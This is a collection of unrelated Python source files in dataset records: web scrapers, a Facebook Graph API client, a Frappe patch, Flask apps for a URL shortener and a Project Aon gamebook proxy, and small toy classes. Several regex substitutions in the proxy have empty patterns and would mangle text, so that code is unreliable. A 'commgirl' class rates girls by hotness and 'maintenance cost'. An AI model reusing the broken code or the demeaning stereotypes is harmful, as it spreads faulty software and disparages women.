meta.css('span::text').extract_first() != None:\n value = meta.css('span::text').extract_first().replace('\\xa0', '')\n if s.find('索引号') != -1:\n doc[\"a_index\"] = value\n elif s.find('分类') != -1:\n doc[\"a_class\"] = value\n elif s.find('发布机构') != -1:\n doc[\"a_pub_org\"] = value\n elif s.find('成文日期') != -1:\n doc[\"a_edit_time\"] = value\n elif s.find('文号') != -1:\n doc[\"a_pub_num\"] = value\n elif s.find('名称') != -1:\n doc[\"a_title\"] = value\n doc[\"a_source\"], doc[\"a_content\"] = get_text(res.css('div.article-content p').extract())\n if len(doc[\"a_content\"]) == 0:\n doc[\"a_source\"], doc[\"a_content\"] = get_text(res.css('div.article-content td').extract())\n if len(doc[\"a_content\"]) == 0:\n doc[\"a_content\"] = '未获取到内容'\n elif len(get_text(res.css('div.zw-info').extract_first())[0]) !=0 :\n title = res.css('h3.zw-title::text').extract_first()\n metas = get_text(res.css('div.zw-info').extract_first())[0]\n meta_strs = res.css('div.zw-info span')\n for meta in meta_strs:\n s = meta.css('span::text').extract_first().replace(' ','')\n if s.find('来源') != -1:\n doc[\"a_pub_org\"] = s[s.find('来源')+3:]\n elif s.find('时间') != -1:\n doc[\"a_pub_time\"] = s[s.find('时间')+3:]\n doc[\"a_pub_meta\"] = metas\n doc[\"a_title\"] = title\n doc[\"a_source\"], doc[\"a_content\"] = get_text(res.css('div.zw p').extract())\n if len(doc[\"a_content\"]) == 0:\n doc[\"a_content\"] = '未获取到内容'\n yield doc\n except Exception as e:\n furl['type'] = str(response.status)\n furl['url'] = response.url\n furl[\"error\"] = str(e)\n yield furl","sub_path":"spdiers/govenment/zhengce/spiders/44_guangd_zc.py","file_name":"44_guangd_zc.py","file_ext":"py","file_size_in_byte":5581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613942094","text":"# Dictionaries. Each key has a value. dictionary = {'key', 'value'}\nclassmates = {'Tony': 'is cool but smells', 'Emma': 'sits behind me', 'Lucy': 'asks too many questions'}\n\n# How to manipulate dictionaries\n'''\nprint(classmates)\nprint(classmates['Lucy'])\n'''\n\n# Manipulate keys and values in a for loop\nfor k, v in classmates.items():\n print(k + \" \" + v)\n","sub_path":"Python3/TNB/oldFiles/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37003465","text":"import requests\n\nfrom exceptions import *\n\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nclass GraphAPI(object):\n \n def __init__(self, oauth_token=None):\n self.oauth_token = oauth_token\n \n def get(self, path='', **options):\n \"\"\"\n Get an item from the Graph API.\n \n Arguments:\n path -- A string describing the path to the item.\n **options -- Graph API parameters such as 'limit', 'offset' or 'since' (see http://developers.facebook.com/docs/reference/api/).\n \"\"\"\n \n response = self._query('GET', path, options)\n \n if response is False:\n raise self.Error('Could not get \"%s\".' 
% path)\n \n return response\n \n def post(self, path='', **data):\n \"\"\"\n Post an item to the Graph API.\n \n Arguments:\n path -- A string describing the path to the item.\n **options -- Graph API publishing parameters (see http://developers.facebook.com/docs/reference/api/#publishing).\n \"\"\"\n \n response = self._query('POST', path, data)\n \n if response is False:\n raise self.Error('Could not post to \"%s\"' % path)\n \n return response\n \n def delete(self, path):\n \"\"\"\n Delete an item in the Graph API.\n \n Arguments:\n path -- A string describing the path to the item.\n \"\"\"\n \n response = self._query('DELETE', path)\n \n if response is False:\n raise self.Error('Could not delete \"%s\"' % path)\n \n return response\n \n def search(self, term, type, **options):\n \"\"\"\n Search for an item in the Graph API.\n \n Arguments:\n term -- A string describing the search term.\n type -- A string describing the type of items to search for *.\n **options -- Additional Graph API parameters, such as 'center' and 'distance' (see http://developers.facebook.com/docs/reference/api/).\n \n Supported types are 'post', 'user', 'page', 'event', 'group', 'place' and 'checkin'.\n \"\"\"\n \n SUPPORTED_TYPES = ['post', 'user', 'page', 'event', 'group', 'place', 'checkin']\n if type not in SUPPORTED_TYPES:\n raise ValueError('Unsupported type \"%s\". Supported types are %s' % (type, ', '.join(SUPPORTED_TYPES)))\n \n options = dict({\n 'q': term,\n 'type': type,\n }, **options)\n \n response = self._query('GET', 'search', options)\n \n return response\n \n \n def _query(self, method, path, data={}):\n \"\"\"\n Low-level access to Facebook's Graph API.\n \n Arguments:\n method -- A string describing the HTTP method.\n path -- A string describing the path.\n data -- A dictionary of HTTP GET parameters (for GET requests) or POST data (for POST requests).\n \"\"\"\n \n # Convert option lists to comma-separated values; Facebook chokes on array-like constructs\n # in the query string (like [...]?ids=['johannes.gorset', 'atle.mo']).\n for key, value in data.items():\n if type(value) is list and all([type(item) in (str, unicode) for item in value]):\n data[key] = ','.join(value)\n \n if self.oauth_token:\n data.update({'access_token': self.oauth_token })\n response = requests.request(method, 'https://graph.facebook.com/%s' % path, data=data)\n\n return self._parse(response.content)\n \n def _parse(self, data):\n \"\"\"\n Parse the response from Facebook's Graph API.\n \n Arguments:\n data -- A string describing the Graph API's response.\n \"\"\"\n \n try:\n data = json.loads(data)\n except ValueError as e:\n return data\n \n # Facebook's Graph API sometimes responds with 'true' or 'false'. Facebook offers no documentation\n # as to the prerequisites for this type of response, though it seems that it responds with 'true'\n # when objects are successfully deleted and 'false' upon attempting to delete or access an item that\n # one does not have access to.\n # \n # For example, the API would respond with 'false' upon attempting to query a feed item without having\n # the 'read_stream' extended permission. 
If you were to query the entire feed, however, it would respond\n # with an empty list instead.\n # \n # Genius.\n #\n # We'll handle this discrepancy as gracefully as we can by implementing logic to deal with this behavior\n # in the high-level access functions (get, post, delete etc.).\n if type(data) is bool:\n return data\n \n if type(data) is dict:\n \n if 'error' in data:\n raise self.Error(data['error']['message'])\n \n # If the response contains a 'data' key, strip everything else (it serves no purpose)\n if 'data' in data:\n data = data['data']\n \n return data\n\n class Error(FacepyError):\n pass\n","sub_path":"facepy/graph_api.py","file_name":"graph_api.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268039520","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.custom.doctype.custom_field.custom_field import create_custom_fields\nfrom verp.regional.india.setup import add_permissions, add_print_formats\n\ndef execute():\n\tcompany = frappe.get_all('Company', filters = {'country': 'India'})\n\tif not company:\n\t\treturn\n\n\tfrappe.reload_doc(\"custom\", \"doctype\", \"custom_field\")\n\tfrappe.reload_doc(\"regional\", \"doctype\", \"e_invoice_settings\")\n\tcustom_fields = {\n\t\t'Sales Invoice': [\n\t\t\tdict(fieldname='irn', label='IRN', fieldtype='Data', read_only=1, insert_after='customer', no_copy=1, print_hide=1,\n\t\t\t\tdepends_on='eval:in_list([\"Registered Regular\", \"SEZ\", \"Overseas\", \"Deemed Export\"], doc.gst_category) && doc.irn_cancelled === 0'),\n\t\t\t\n\t\t\tdict(fieldname='ack_no', label='Ack. No.', fieldtype='Data', read_only=1, hidden=1, insert_after='irn', no_copy=1, print_hide=1),\n\t\t\n\t\t\tdict(fieldname='ack_date', label='Ack. 
Date', fieldtype='Data', read_only=1, hidden=1, insert_after='ack_no', no_copy=1, print_hide=1),\n\n\t\t\tdict(fieldname='irn_cancelled', label='IRN Cancelled', fieldtype='Check', no_copy=1, print_hide=1,\n\t\t\t\tdepends_on='eval:(doc.irn_cancelled === 1)', read_only=1, allow_on_submit=1, insert_after='customer'),\n\n\t\t\tdict(fieldname='eway_bill_cancelled', label='E-Way Bill Cancelled', fieldtype='Check', no_copy=1, print_hide=1,\n\t\t\t\tdepends_on='eval:(doc.eway_bill_cancelled === 1)', read_only=1, allow_on_submit=1, insert_after='customer'),\n\n\t\t\tdict(fieldname='signed_einvoice', fieldtype='Code', options='JSON', hidden=1, no_copy=1, print_hide=1, read_only=1),\n\n\t\t\tdict(fieldname='signed_qr_code', fieldtype='Code', options='JSON', hidden=1, no_copy=1, print_hide=1, read_only=1),\n\n\t\t\tdict(fieldname='qrcode_image', label='QRCode', fieldtype='Attach Image', hidden=1, no_copy=1, print_hide=1, read_only=1)\n\t\t]\n\t}\n\tcreate_custom_fields(custom_fields, update=True)\n\tadd_permissions()\n\tadd_print_formats()\n\n\teinvoice_cond = 'in_list([\"Registered Regular\", \"SEZ\", \"Overseas\", \"Deemed Export\"], doc.gst_category)'\n\tt = {\n\t\t'mode_of_transport': [{'default': None}],\n\t\t'distance': [{'mandatory_depends_on': f'eval:{einvoice_cond} && doc.transporter'}],\n\t\t'gst_vehicle_type': [{'mandatory_depends_on': f'eval:{einvoice_cond} && doc.mode_of_transport == \"Road\"'}],\n\t\t'lr_date': [{'mandatory_depends_on': f'eval:{einvoice_cond} && in_list([\"Air\", \"Ship\", \"Rail\"], doc.mode_of_transport)'}],\n\t\t'lr_no': [{'mandatory_depends_on': f'eval:{einvoice_cond} && in_list([\"Air\", \"Ship\", \"Rail\"], doc.mode_of_transport)'}],\n\t\t'vehicle_no': [{'mandatory_depends_on': f'eval:{einvoice_cond} && doc.mode_of_transport == \"Road\"'}],\n\t\t'ewaybill': [\n\t\t\t{'read_only_depends_on': 'eval:doc.irn && doc.ewaybill'},\n\t\t\t{'depends_on': 'eval:((doc.docstatus === 1 || doc.ewaybill) && doc.eway_bill_cancelled === 0)'}\n\t\t]\n\t}\n\n\tfor field, conditions in t.items():\n\t\tfor c in conditions:\n\t\t\t[(prop, value)] = c.items()\n\t\t\tfrappe.db.set_value('Custom Field', { 'fieldname': field }, prop, value)\n","sub_path":"verp/patches/v12_0/setup_einvoice_fields.py","file_name":"setup_einvoice_fields.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529174056","text":"import math\nclass commgirl:\n\tdef __init__(self,name,hotn,smrtn,mntcst,choice,bo,typ):\n\t\tself.name=name\n\t\tself.hotn=hotn#girl's hotness: a no. from 0-9\n\t\tself.smrtn=smrtn#girl's smartness: a no. from 0-9\n\t\tself.mntcst=mntcst#girl's maintainence cost: a no. from 0-999\n\t\tself.choice=choice#girl's choce: a no. 
from a set of {'a','r','i'} , 'a' for most attractive, 'r' for richest and 'i' for most intelligent\n\t\tself.bo=bo\n\t\tself.typ=typ#type: a letter from set {'c','n','d'} c for choosy, n for normal and d for desperate\n\tdef happinesscalculator(self):\n\t\tif self.typ=='c':\n\t\t\tself.hpns=4#math.log(self.bo.mnyspt-self.mntcst)+(self.bo.totvalue+self.bo.lgiftv)# a girl's happiness as an attribute\n\t\telif self.typ=='n':\n\t\t\tself.hpns=4#(self.bo.mnyspt-self.mntcst)/100+self.bo.totvalue\n\t\telse :\n\t\t\tself.hpns=4#math.exp(self.bo.mnyspt-self.mntcst)\n\t\t\t\n","sub_path":"commgirl.py","file_name":"commgirl.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370284716","text":"from flask import Flask, render_template, request, redirect, _app_ctx_stack, jsonify\nfrom sqlite3 import dbapi2 as sqlite3\nimport short_url\nimport os\nimport math\n\nALPHABET = \"abcdfghjklmnpqrstvwxyz0123456789BCDFGHJKLMNPQRSTVWXYZ\"\nBASE = len(ALPHABET)\nMAXLEN = 6\n\napp = Flask(__name__)\n\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'urls.db'),\n DEBUG=True,\n SECRET_KEY='development key'\n))\n\n\n\ndef encode_id(n):\n\n pad = MAXLEN - 1\n n = int(n + pow(BASE, pad))\n\n s = []\n t = int(math.log(n, BASE))\n while True:\n bcp = int(pow(BASE, t))\n a = int(n / bcp) % BASE\n s.append(ALPHABET[a:a+1])\n n = n - (a * bcp)\n t -= 1\n if t < 0: break\n\n return \"\".join(reversed(s))\n\ndef decode_id(n):\n\n n = \"\".join(reversed(n))\n s = 0\n l = len(n) - 1\n t = 0\n while True:\n bcpow = int(pow(BASE, l - t))\n s = s + ALPHABET.index(n[t:t+1]) * bcpow\n t += 1\n if t > l: break\n\n pad = MAXLEN - 1\n s = int(s - pow(BASE, pad))\n\n return int(s)\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n top = _app_ctx_stack.top\n if not hasattr(top, 'sqlite_db'):\n top.sqlite_db = sqlite3.connect(app.config['DATABASE'])\n top.sqlite_db.row_factory = sqlite3.Row\n return top.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_database(exception):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n top = _app_ctx_stack.top\n if hasattr(top, 'sqlite_db'):\n top.sqlite_db.close()\n\n\ndef init_db():\n \"\"\"Initializes the database.\"\"\"\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\"\"\"\n@app.cli.command('initdb')\ndef initdb_command():\n Creates the database tables.\n init_db()\n print('Initialized the database.')\n\"\"\"\n\ndef query_db(query, args=(), one=False):\n \"\"\"Queries the database and returns a list of dictionaries.\"\"\"\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n return (rv[0] if rv else None) if one else rv\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/short_url')\ndef short_url():\n print('yo')\n url = request.args.get('url_string', 'http://placeholder.it', type=str)\n print(url)\n db = get_db()\n print(\"test\")\n db.execute('insert into urls (url_string) values (?)', (url,))\n print(\"?\")\n db.commit()\n ids = query_db('select max(url_id) from urls', one=True)\n last_id = 0\n for id in ids:\n print(id)\n last_id = id\n print(encode_id(last_id))\n url_hash = encode_id(last_id)\n print(url_hash)\n print(jsonify(hash=url_hash))\n return jsonify(hash=url_hash)\n\n@app.route('/<url_hash>')\ndef redirect_to_hash(url_hash):\n url_id = decode_id(url_hash)\n 
print(url_id)\n url = query_db('select * from urls where url_id = ?', (url_id,), one=True)\n return redirect(url['url_string'])\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=80)\n","sub_path":"shortener.py","file_name":"shortener.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410653398","text":"from flask import Flask\nfrom flask import request\nfrom flask import Response\nfrom flask import render_template\nfrom flask import make_response\nfrom whitenoise import WhiteNoise\nimport requests\n\nimport jinja2\nimport os\nimport datetime\n\nimport cgi\nimport urllib.request, urllib.parse, urllib.error\nimport http.client\nimport re\nimport urllib.request, urllib.error, urllib.parse\nimport string\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n\tloader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\napp = Flask(__name__)\napp.wsgi_app = WhiteNoise(app.wsgi_app, root='./static')\n\n@app.route('/')\ndef IndexPage():\n\tif request.method == 'GET':\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/index.html')\n\t\treturn render_template(template)\n\n@app.route('/triggercache')\ndef TriggerCachePage():\n\tif request.method == 'GET':\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/triggercache.html')\n\t\treturn render_template(template)\n\n@app.route('/app.appcache')\ndef OfflineApplicationCacheManifest():\n\tdef getTitleFilePaths(title_res):\n\t\tdata_query = '\\n'\n\t\tif request.args.get('app','') == 'true':\n\t\t\tdata_query = '&type=jsonp&callback=fback\\n'\n\n\t\ttitle_files = []\n\t\ttemp_files = title_res.readlines()\n\n\t\t# Add the XML data file, cached either as xml for the web or jsonp for apps\n\t\ttitle_files.append(temp_files[0].replace('\\n', '') + data_query) \n\n\t\ttitle_images = temp_files[1] # Get the images URL\n\t\turl = title_images\n\t\tpattern = '(.*\\.png)'\n\t\tresponse = requests.get(url).text\n\n\t\tfor image in re.findall(pattern, response):\n\t\t\ttitle_files.append(url.replace('\\n', '') + image + '\\n')\n\t\tlast_file_index = len(title_files) - 1\n\t\ttitle_files[last_file_index] = title_files[last_file_index].rstrip('\\n') # Get rid of the last newline\n\n\t\treturn title_files\n\n\tif request.method == 'GET':\n\t\t# Check the cookie value to see if the user has agreed to the terms, \n\t\t# and if so then add the projecaon.org resource files to the cache manifest\n\t\tapp_files = []\n\t\tappmod_files = []\n\t\tui_files = []\n\t\ttitle1_files = []\n\t\ttitle2_files = []\n\t\ttitle3_files = []\n\t\ttitle4_files = []\n\t\ttitle5_files = []\n\t\ttitle6_files = []\n\t\ttitle7_files = []\n\t\ttitle8_files = []\n\t\tagreed = 0\n\t\tif 'agreed' in request.cookies:\n\t\t\tagreed = request.cookies['agreed']\n\t\twith open('./app/resources/app.res') as app_res:\n\t\t\tapp_files = app_res.readlines()\n\t\twith open('./app/resources/appmod.res') as appmod_res:\n\t\t\tappmod_files = appmod_res.readlines()\n\t\t\tappmod_files = [file.replace('\\n', '') + '?0.2.205\\n' for file in appmod_files]\n\t\t\tappmod_files[-1] = appmod_files[-1].replace('\\n', '') # Remove the last line's line break\n\t\tif agreed == '1':\n\t\t\twith open('./app/resources/ui.res') as ui_res:\n\t\t\t\tui_files = ui_res.readlines()\n\t\t\twith open('./app/resources/title1.res') as title1_res:\n\t\t\t\ttitle1_files = getTitleFilePaths(title1_res)\n\t\t\twith open('./app/resources/title2.res') as title2_res:\n\t\t\t\ttitle2_files = 
getTitleFilePaths(title2_res)\n\t\t\twith open('./app/resources/title3.res') as title3_res:\n\t\t\t\ttitle3_files = getTitleFilePaths(title3_res)\n\t\t\twith open('./app/resources/title4.res') as title4_res:\n\t\t\t\ttitle4_files = getTitleFilePaths(title4_res)\n\t\t\twith open('./app/resources/title5.res') as title5_res:\n\t\t\t\ttitle5_files = getTitleFilePaths(title5_res)\n\n\t\ttemplate_values = {\n\t\t\t'datetimestamp': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), \n\t\t\t'app_files': app_files, \n\t\t\t'appmod_files': appmod_files, \n\t\t\t'ui_files': ui_files, \n\t\t\t'title1_files': title1_files, \n\t\t\t'title2_files': title2_files, \n\t\t\t'title3_files': title3_files, \n\t\t\t'title4_files': title4_files, \n\t\t\t'title5_files': title5_files, \n\t\t\t'title6_files': title6_files, \n\t\t\t'title7_files': title7_files, \n\t\t\t'title8_files': title8_files \n\t\t}\n\t\ttemplate = JINJA_ENVIRONMENT.get_template('templates/app.appcache')\n\n\t\tresp = make_response(render_template(template, **template_values))\n\n\t\tresp.headers['Content-Type'] = 'text/cache-manifest'\n\n\t\t# Do not cache the cache manifest file.\n\t\tresp.headers['cache-control'] = 'no-cache, no-store, must-revalidate'\n\t\tresp.headers['Pragma'] = 'no-cache'\n\t\tresp.headers['Expires'] = '0'\n\n\t\treturn resp\n\n@app.route('/totalfiles')\ndef GetTotalFiles():\n\tdef getTitleFileCount(title_res):\n\t\ttitle_file_count = 0\n\t\ttemp_files = title_res.readlines()\n\t\ttitle_file_count += 1 # Add the XML data file\n\t\ttitle_images = temp_files[1] # Get the images URL\n\t\turl = title_images\n\t\tpattern = '(.*\\.png)'\n\t\tresponse = requests.get(url).text\n\t\tfor image in re.findall(pattern, response):\n\t\t\ttitle_file_count += 1\n\t\treturn title_file_count\n\n\tif request.method == 'GET':\n\t\tapp_file_count = 0\n\t\tappmod_file_count = 0\n\t\tui_file_count = 0\n\t\ttitle1_file_count = 0\n\t\ttitle2_file_count = 0\n\t\ttitle3_file_count = 0\n\t\ttitle4_file_count = 0\n\t\ttitle5_file_count = 0\n\t\ttitle6_file_count = 0\n\t\ttitle7_file_count = 0\n\t\ttitle8_file_count = 0\n\t\tagreed = 0\n\t\tif 'agreed' in request.cookies:\n\t\t\tagreed = request.cookies['agreed']\n\t\twith open('./app/resources/app.res') as app_res:\n\t\t\tapp_file_count = len(app_res.readlines())\n\t\twith open('./app/resources/appmod.res') as appmod_res:\n\t\t\tappmod_file_count = len(appmod_res.readlines())\n\t\tif agreed == '1':\n\t\t\twith open('./app/resources/ui.res') as ui_res:\n\t\t\t\tui_file_count = len(ui_res.readlines())\n\t\t\twith open('./app/resources/title1.res') as title1_res:\n\t\t\t\ttitle1_file_count = getTitleFileCount(title1_res)\n\t\t\twith open('./app/resources/title2.res') as title2_res:\n\t\t\t\ttitle2_file_count = getTitleFileCount(title2_res)\n\t\t\twith open('./app/resources/title3.res') as title3_res:\n\t\t\t\ttitle3_file_count = getTitleFileCount(title3_res)\n\t\t\twith open('./app/resources/title4.res') as title4_res:\n\t\t\t\ttitle4_file_count = getTitleFileCount(title4_res)\n\t\t\twith open('./app/resources/title5.res') as title5_res:\n\t\t\t\ttitle5_file_count = getTitleFileCount(title5_res)\n\n\t\ttemplate_values = {\n\t\t\t'total_files': (\n\t\t\t\tui_file_count + app_file_count + appmod_file_count + \n\t\t\t\ttitle1_file_count + \n\t\t\t\ttitle2_file_count + \n\t\t\t\ttitle3_file_count + \n\t\t\t\ttitle4_file_count + \n\t\t\t\ttitle5_file_count + \n\t\t\t\ttitle6_file_count + \n\t\t\t\ttitle7_file_count + \n\t\t\t\ttitle8_file_count - 1\n\t\t\t)\n\t\t}\n\t\ttemplate = 
JINJA_ENVIRONMENT.get_template('templates/totalfiles')\n\n\t\treturn render_template(template, **template_values)\n\n@app.route('/data', methods=['GET', 'POST'])\ndef ProxyController():\n\tdef doProxy(p, is_post):\n\n\t\t# Only download the XML content from projectaon.org if the user has agreed to the terms.\n\t\tagreed = 0\n\t\tif 'agreed' in request.cookies:\n\t\t\tagreed = request.cookies['agreed']\n\t\twith open('./app/resources/app.res') as app_res:\n\t\t\tapp_files = app_res.readlines()\n\t\tif agreed == '1':\n\n\t\t\ttitle = ''\n\n\t\t\tif p.get('title','') == '':\n\t\t\t\treturn 'resource location not found'\n\t\t\telse:\n\t\t\t\ttitle = p['title']\n\n\t\t\t\tdataType = 'xml'\n\t\t\t\tif p.get('type','') == 'jsonp':\n\t\t\t\t\tdataType = 'jsonp'\n\t\t\t\tcallbackFn = ''\n\t\t\t\tif p.get('callback','') != '':\n\t\t\t\t\tcallbackFn = p['callback']\n\n\t\t\t\turl = ''\n\t\t\t\tif title == '1':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/01fftd.xml' \n\t\t\t\tif title == '2':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/02fotw.xml' \n\t\t\t\tif title == '3':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/03tcok.xml' \n\t\t\t\tif title == '4':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/04tcod.xml' \n\t\t\t\tif title == '5':\n\t\t\t\t\turl = 'https://www.projectaon.org/en/xml/05sots.xml' \n\n\t\t\t\tvalid_content = '';\n\t\t\t\tif url != '':\n\t\t\t\t\tif is_post:\n\t\t\t\t\t\tdata = urllib.parse.urlencode(p)\n\t\t\t\t\t\treq = urllib.request.Request(url, data)\n\t\t\t\t\t\tresult = requests.get(url)\n\t\t\t\t\t\tvalid_content = result.text\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult = requests.get(url)\n\t\t\t\t\t\tvalid_content = result.text\n\n\t\t\t\t\t# remove general directives\n\t\t\t\t\tvalid_content = valid_content.replace('%general.links;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('%xhtml.links;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('%general.inclusions;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&link.project.website;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.joe.dever.bio.lw;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.gary.chalk.bio.lw;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&link.staff.contact;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.project.aon.license;', '')\n\t\t\t\t\tvalid_content = valid_content.replace('&inclusion.joe.dever.endowment;', '')\n\n\t\t\t\t\t# replace non-valid special characters with html special characters\n\t\t\t\t\tvalid_content = re.sub('', '&hellip;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&hellip;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&mdash;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&ndash;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&rsquo;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '
', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '-', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', '&amp;', valid_content);\n\t\t\t\t\tvalid_content = re.sub('', ' ', valid_content);\n\n\t\t\t\t\t# replace html special characters\n\t\t\t\t\tvalid_content = re.sub('', r'&\\1;', valid_content);\n\n\t\t\t\tif dataType == 'jsonp':\n\t\t\t\t\t# get rid of new lines\n\t\t\t\t\tvalid_content = re.sub(r'\\r', '', valid_content);\n\t\t\t\t\tvalid_content = re.sub(r'\\n', '', valid_content);\n\n\t\t\t\t\tresp = Response(callbackFn + '(\\'' + valid_content + '\\');')\n\t\t\t\t\tresp.headers['Content-Type'] = 'text/javascript'\n\t\t\t\t\treturn resp\n\t\t\t\telse:\n\t\t\t\t\tresp = Response(valid_content)\n\t\t\t\t\tresp.headers['Content-Type'] = 'text/xml'\n\t\t\t\t\treturn resp\n\n\t# handles get requests\n\tif request.method == 'GET':\n\t\treturn doProxy(request.args, False)\n\n\t# handles post requests\n\tif request.method == 'POST':\n\t\treturn doProxy(request.form, True)\n\nif __name__ == \"__main__\":\n\tapp.run(host='0.0.0.0', port=8000)\n","sub_path":"app/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":9813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80739846","text":"## Write a program that loads one ten-element vector with people's names and another with their weights, find the heaviest and the lightest person and\n## display their names and weights. Use two vectors, one for weight and one for name. Do not use any ready-made Python helper function.\n\nvet_nome = []\nvet_peso = []\nfor i in range(10):\n vet_nome.append(str(input('Digite o nome: ')))\n vet_peso.append(float(input('Digite o peso: ')))\n if i == 0:\n peso_maior = vet_peso[i]\n peso_menor = vet_peso[i]\n nome_gordo = vet_nome[i]\n nome_magro = vet_nome[i]\n if vet_peso[i] > peso_maior:\n peso_maior = vet_peso[i]\n nome_gordo = vet_nome[i]\n if vet_peso[i] < peso_menor:\n peso_menor = vet_peso[i]\n nome_magro = vet_nome[i]\nprint(nome_gordo, 'possui o maior peso, com', peso_maior, 'quilos.')\nprint(nome_magro, 'possui o menor peso, com', peso_menor, 'quilos.')\n","sub_path":"Vetor - Ex3.py","file_name":"Vetor - Ex3.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316118556","text":"import os\nimport sys\n\npath = os.path.abspath(os.path.join(os.path.dirname(__file__), '../utils/'))\nif path not in sys.path:\n sys.path.insert(1, path)\ndel path\n\nimport utils\n\n\nclass Node:\n def __init__(self):\n self.ip_address = '0.0.0.0'\n self.connections = {}\n self.routingPath = {}\n\n def addConnection(self, destination, distance):\n utils.Utils.isStr(destination)\n utils.Utils.isFloat(distance)\n self.connections[destination] = distance\n\n def addPath(self, destination, path):\n utils.Utils.isStr(destination)\n self.routingPath[destination] = path\n\n\nclass Path:\n def __init__(self, aPath, aValue):\n utils.Utils.isList(aPath)\n utils.Utils.isFloat(aValue)\n self.path = aPath\n self.value = aValue\n","sub_path":"src/node/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"6792883","text":"#Configuration File\n#IMPORT ALL VARIABLES FROM .env\n\nimport os\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\nDEBUG_VAR = os.environ.get(\"DEBUG_VAR\")\ndbName = 
os.environ.get(\"dbName\")\ndbUrl = os.environ.get(\"dbUrl\")\n\nif DEBUG_VAR == 'True':\n DEBUG = \"ON\"\nelse:\n DEBUG = \"FALSE\"\n\n# TIME ZONE VARIABLE\nTIME_ZONE = os.environ.get(\"TIME_ZONE\", \"America/Mexico_City\")\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309827667","text":"import datetime\n\n\ndef json_serializer(obj):\n \"\"\"Сериализация объекта в JSON с учётом специфических типов данных.\n\n Args:\n obj (str|None): Объект на входе.\n \"\"\"\n if isinstance(obj, (datetime.datetime, datetime.date)):\n obj = obj.isoformat()\n else:\n obj = str(obj)\n\n return obj\n","sub_path":"project/shortcuts/json_serializer.py","file_name":"json_serializer.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256413480","text":"from bs4 import BeautifulSoup\nimport requests\n\ndata = requests.get(r'https://fortnitestats.net/')\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\ntable = soup.find('table')\n\nfor row in soup.find_all('tr', {'class':'player-row'}):\n place = row.find_all('td')[0].text.strip()\n score = row.find_all('td')[6].text.strip()\n\n print(place, \" score: \", score)","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"357518109","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np \nimport vtolParam as P\n\n\nclass vtolAnimation:\n '''\n Create satellite animation\n '''\n def __init__(self):\n # Used to indicate initialization\n self.flag_init = True\n \n # Initializes a figure and axes object\n self.fig, self.ax = plt.subplots()\n\n # Initializes a list object that will be used to contain\n # handles to the patches and line objects.\n self.handle = []\n \n plt.axis([0*P.length, 2.0*P.length, 0*P.length,\n 2.0*P.length])\n 